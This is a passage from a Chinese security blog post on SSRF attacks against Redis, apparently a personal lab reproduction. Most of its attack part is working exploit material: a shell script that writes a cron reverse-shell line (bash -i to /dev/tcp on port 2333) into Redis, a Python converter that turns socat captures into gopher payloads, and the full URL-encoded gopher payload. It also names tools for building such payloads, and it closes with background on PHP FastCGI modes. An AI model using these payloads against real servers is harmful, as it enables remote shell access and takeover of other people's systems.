<span class="token keyword">echo</span> -e <span class="token string">"\n\n\n*/1 * * * * bash -i >&amp; /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&amp;1\n\n\n"</span><span class="token operator">|</span>redis-cli -h <span class="token variable">$1</span> -p <span class="token variable">$2</span> -x <span class="token keyword">set</span> 1
/*在redis第0个数据库添加key为1，value为反弹shell语句的字段*/
/*echo -e 处理特殊字符，若字符串中出现特殊字符【如\n】，则加以处理，不会将它当成一般文字输出*/
redis-cli -h <span class="token variable">$1</span> -p <span class="token variable">$2</span> config <span class="token keyword">set</span> <span class="token function">dir</span> /var/spool/cron/
redis-cli -h <span class="token variable">$1</span> -p <span class="token variable">$2</span> config <span class="token keyword">set</span> dbfilename root
redis-cli -h <span class="token variable">$1</span> -p <span class="token variable">$2</span> save
redis-cli -h <span class="token variable">$1</span> -p <span class="token variable">$2</span> quit
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="socat转发获取TCP包"><a href="#socat转发获取TCP包" class="headerlink" title="socat转发获取TCP包"></a>socat转发获取TCP包</h3><blockquote>
<p><em>socat是一个多功能的网络工具</em></p>
<pre class="line-numbers language-socat"><code class="language-socat">语法：
socat [options] <address> <address>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>Socat 所做的工作就是在 2 个 address 指定的描述符间建立一个 pipe 用于发送和接收数据。</p>
<p>参考地址：<code>http://linux.51yip.com/search/socat</code></p>
</blockquote>
<p><img src="image-20211023203621333.png" alt="image-20211023203621333"></p>
<p><img src="image-20211023203911140.png" alt="image-20211023203911140"></p>
<pre class="line-numbers language-bash"><code class="language-bash">socat -v tcp-listen:2333,fork tcp:localhost:6379
-v 将中转的数据流明文显示
tcp-listen:2333,fork 监听端口2333,选项为转发
tcp:localhost:6379 转发地址
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后再开个页面运行命令脚本</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">bash</span> shell.sh 127.0.0.1 2333
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20211023211350543.png" alt="image-20211023211350543"></p>
<p>上图ERR是我服务器redis配置有问题，删OK的时候把它也删除就行</p>
<h3 id="说一下SAVE失败的坑"><a href="#说一下SAVE失败的坑" class="headerlink" title="说一下SAVE失败的坑"></a>说一下SAVE失败的坑</h3><p>这里顺便说一下，这是一个坑</p>
<p><strong>我这里是新下载的redis，默认工作路径是<code>/var/lib/redis</code></strong></p>
<p><img src="image-20211024104019914.png" alt="image-20211024104019914"></p>
<p><strong>然而我们攻击时反弹shell和写入shell分别需要执行<code>config set dir /var/spool/cron/</code>和<code>config set /var/www/html/</code></strong></p>
<p><strong>redis 对这几个目录均无读写权限，所以一但执行就会导致save命令报错</strong></p>
<p><img src="image-20211024104816975.png" alt="image-20211024104816975"></p>
<p>可以看到，上面save返回OK，下面报错</p>
<p>百度好半天都没解决，我就看了下日志</p>
<p><img src="image-20211024140110992.png" alt="image-20211024140110992"></p>
<p>复制日志又半天，还是不行</p>
<p>仔细一寻思，好像大部分目录都没可写权限，包括html</p>
<p>然后</p>
<p><img src="image-20211024140550064.png" alt="image-20211024140550064"></p>
<p>很好，成功被百度浪费一早上</p>
<p><strong>这次复现成功让我明白了，SSRF攻击redis看似炫酷，实际和sql写马一样，鸡肋</strong></p>
<p><strong>都需要特定的条件，redis为</strong></p>
<blockquote>
<p><strong>权限777的目录【或者本就能文件上传的目录】</strong></p>
<p><strong>或者root身份运行redis</strong></p>
<p>如图，默认是redis用户身份</p>
<p><img src="image-20211024142633540.png" alt="image-20211024142633540"></p>
</blockquote>
<blockquote>
<p>解决方式：通过root用户使用redis-server启动redis</p>
</blockquote>
<pre class="line-numbers language-bash"><code class="language-bash">redis-server /etc/redis/redis.conf
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p><img src="image-20211024155017742.png" alt="image-20211024155017742"></p>
<h3 id="转换规则："><a href="#转换规则：" class="headerlink" title="转换规则："></a>转换规则：</h3><p>分别对每一行进行筛选</p>
<ul>
<li>如果单行第一个字符是<code>&gt;</code>或者<code>&lt; </code>那么丢弃该行字符串，该行是请求和返回的时间。</li>
<li>如果单行前3个字符是<code>+OK</code> 那么丢弃该行字符串，该行是返回的字符串。</li>
<li>将<code>\r</code>字符串替换成<code>%0d%0a</code></li>
<li>空白行替换为<code>%0a</code></li>
</ul>
<p>可以写python进行处理，这里引用参考文章的脚本</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token comment" spellcheck="true">#用法: python tran2gopher.py socat.log</span>
<span class="token comment" spellcheck="true">#coding: utf-8</span>
<span class="token comment" spellcheck="true">#author: JoyChou</span>
<span class="token keyword">import</span> sys
exp <span class="token operator">=</span> <span class="token string">''</span>

<span class="token keyword">with</span> open<span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
    <span class="token keyword">for</span> line <span class="token keyword">in</span> f<span class="token punctuation">.</span>readlines<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> line<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token keyword">in</span> <span class="token string">'>&lt;+'</span><span class="token punctuation">:</span>
            <span class="token keyword">if</span> line<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token keyword">in</span> <span class="token string">'?'</span><span class="token punctuation">:</span>
                exp <span class="token operator">=</span> exp <span class="token operator">+</span> line
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">continue</span>
        <span class="token comment" spellcheck="true"># 判断倒数第2、3字符串是否为\r</span>
        <span class="token keyword">elif</span> line<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">==</span> r<span class="token string">'\r'</span><span class="token punctuation">:</span>
            <span class="token comment" spellcheck="true"># 如果该行只有\r，将\r替换成%0a%0d%0a</span>
            <span class="token keyword">if</span> len<span class="token punctuation">(</span>line<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">3</span><span class="token punctuation">:</span>
                exp <span class="token operator">=</span> exp <span class="token operator">+</span> <span class="token string">'%0a%0d%0a'</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                line <span class="token operator">=</span> line<span class="token punctuation">.</span>replace<span class="token punctuation">(</span>r<span class="token string">'\r'</span><span class="token punctuation">,</span> <span class="token string">'%0d%0a'</span><span class="token punctuation">)</span>
                <span class="token comment" spellcheck="true"># 去掉最后的换行符</span>
                line <span class="token operator">=</span> line<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span>
                exp <span class="token operator">=</span> exp <span class="token operator">+</span> line
        <span class="token comment" spellcheck="true"># 判断是否是空行，空行替换为%0a</span>
        <span class="token keyword">elif</span> line <span class="token operator">==</span> <span class="token string">'\x0a'</span><span class="token punctuation">:</span>
            exp <span class="token operator">=</span> exp <span class="token operator">+</span> <span class="token string">'%0a'</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            line <span class="token operator">=</span> line<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">,</span> <span class="token string">''</span><span class="token punctuation">)</span>
            exp <span class="token operator">=</span> exp <span class="token operator">+</span> line
exp<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"$"</span><span class="token punctuation">,</span> <span class="token string">"%24"</span><span class="token punctuation">)</span>
exp<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"&lt;"</span><span class="token punctuation">,</span> <span class="token string">"%3C"</span><span class="token punctuation">)</span>
exp<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">">"</span><span class="token punctuation">,</span> <span class="token string">"%3E"</span><span class="token punctuation">)</span>
exp<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"?"</span><span class="token punctuation">,</span> <span class="token string">"%3F"</span><span class="token punctuation">)</span>
<span class="token keyword">print</span> exp
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<pre class="line-numbers language-payload"><code class="language-payload">*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$62%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>将处理后的数据拼接gopher://xxx.xxx.xxx.xxx/_进行url编码</p>
<p><img src="image-20211024143019099.png" alt="image-20211024143019099"></p>
<p>全OK代表成功</p>
<p><img src="image-20211024143152157.png" alt="image-20211024143152157"></p>
<p>这里是写入一句话的脚本</p>
<p>需要密码在最开始写上就行</p>
<p><img src="image-20211024143251711.png" alt="image-20211024143251711"></p>
<h2 id="工具攻击"><a href="#工具攻击" class="headerlink" title="工具攻击"></a>工具攻击</h2><p>这个就多了，无密码自然用Gopherus ，有密码用 redis-ssrf</p>
<p><strong>redis-ssrf：<code>https://github.com/xmsec/redis-ssrf</code></strong></p>
<p><strong>这个工具需要redis-rogue-server提供exp.so<code>https://github.com/n0b0dyCN/redis-rogue-server</code></strong></p>
<p><strong>Gopherus:  <code>https://github.com/tarunkant/Gopherus</code></strong></p>
<p>Gopherus虽然无法对有密码的redis进行payload构建，但它是SSRF的万金油工具，攻击fastcgi、mysql都可以用</p>
<p>工具用法就不解释了</p>
<h2 id="对PHP运行模式的补充"><a href="#对PHP运行模式的补充" class="headerlink" title="对PHP运行模式的补充"></a>对PHP运行模式的补充</h2><h3 id="中间件三种运行方式"><a href="#中间件三种运行方式" class="headerlink" title="中间件三种运行方式"></a>中间件三种运行方式</h3><p>这点上面也写了，不过现在看实在是写的垃圾，所以这里简单解释一下</p>
<blockquote>
<p>一、我们都知道网页是以http协议或者https传输的</p>
</blockquote>
<p>当外部访问服务器php网站时，请求并不是直接交给程序处理，而是先交给中间服务器，也就是中间件</p>
<p>比如Nginx、Apache</p>
<p>取张参考文章的图</p>
<p><img src="1.png" alt="img"></p>
<p>数据到达中间件后，http数据被解析，这时数据有三种办法去往php</p>
<blockquote>
<p>apache2-module模式</p>
</blockquote>
<p>把 php 当做 apache 的一个模块，实际上 php 就相当于 apache 中的一个 dll 或一个 so 文件，phpstudy 的非 nts 模式就是默认以 module 方式连接的。</p>
<blockquote>
<p>CGI模式</p>
</blockquote>
<p>此时 php 是一个独立的进程，中间件也是一个独立的进程，然后当中间件监听到 HTTP 请求时，会去调用 php-cgi 进程，他们之间通过 cgi 协议，服务器把请求内容转换成 php-cgi 能读懂的协议数据传递给 cgi 进程，cgi 进程拿到内容就会去解析对应 php 文件，得到的返回结果在返回给中间件，最后中间件返回到客户端</p>
<blockquote>
<p>FastCGI模式</p>
</blockquote>
<p>Fastcgi是对Cgi的优化，本质也是Cgi</p>
<h3 id="FastCGI两种通信方式"><a href="#FastCGI两种通信方式" class="headerlink" title="FastCGI两种通信方式"></a>FastCGI两种通信方式</h3><p>在PHP使用FastCGI连接模式的情况下，中间件和PHP-FPM之间的通信方式又分为两种：</p>
<blockquote>
<p>TCP模式</p>
</blockquote>
<p>TCP模式即是PHP-FPM进程会监听本机上的一个端口（默认为9000），然后中间件会把客户端数据通过FastCGI协议传给9000端口，PHP-FPM拿到数据后会调用CGI进程解析。</p>
<blockquote>
<p>Unix Socket模式</p>
</blockquote>
<p>Unix套接字模式是Unix系统进程间通信（IPC）的一种被广泛采用方式，以文件（一般是.sock）作为socket的唯一标识（描述符），需要通信的两个进程引用同一个socket描述符文件就可以建立通道进行通信了。</p>
<p>相比之下，Unix套接字模式的性能会优于TCP模式。</p>
<p>这个运行模式有点类似Linux系统对文件描述符的调用</p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Atmujie</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://atmujie.github.io/2021/09/22/SSRF/">http://atmujie.github.io/2021/09/22/SSRF/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Atmujie</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    
        <div class="disqus-card card" data-aos="fade-up">
    <div id="disqus_thread" class="card-content">
        <noscript>Please enable JavaScript to view the
            <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
    </div>
</div>

<script type="text/javascript">
    disqus_config = function () {
        this.page.url = 'http://atmujie.github.io/2021/09/22/SSRF/';
        this.page.identifier = '/2021/09/22/SSRF/';
        this.page.title = 'SSRF';
    };
    let disqus_shortname = '';

    (function () { // DON'T EDIT BELOW THIS LINE
        let d = document, s = d.createElement('script');
        // 如：s.src = 'https://blinkfox.disqus.com/embed.js';
        s.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'GHiPEgESACHszUJMqTqLWQtF-gzGzoHsz',
        appKey: 'Lm6vLWBnRM3KIlhuo4tqDNDq',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/09/28/%E8%AE%B0%E4%BA%8B%E7%B0%BF-%E5%90%84%E8%AF%AD%E8%A8%80%E4%B9%8B%E9%97%B4%E7%9A%84base%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/21.jpg" class="responsive-img" alt="记事簿-各语言之间的base编码问题">
                        
                        <span class="card-title">记事簿-各语言之间的base编码问题</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-09-28
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Atmujie
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/09/17/XEE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="XEE漏洞学习">
                        
                        <span class="card-title">XEE漏洞学习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-09-17
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Atmujie
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


<!-- 代码块功能依赖 -->
<!-- <script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script> -->

<!-- 代码语言 -->
<!--  -->
<!-- <script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script> -->
<!--  -->

<!-- 代码块复制 -->
<!-- 
<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>
 -->

<!-- 代码块收缩 -->
<!--  -->

<!-- 代码块折行 -->
<!-- 
<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>
 -->

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">Atmujie</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/atmujie" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
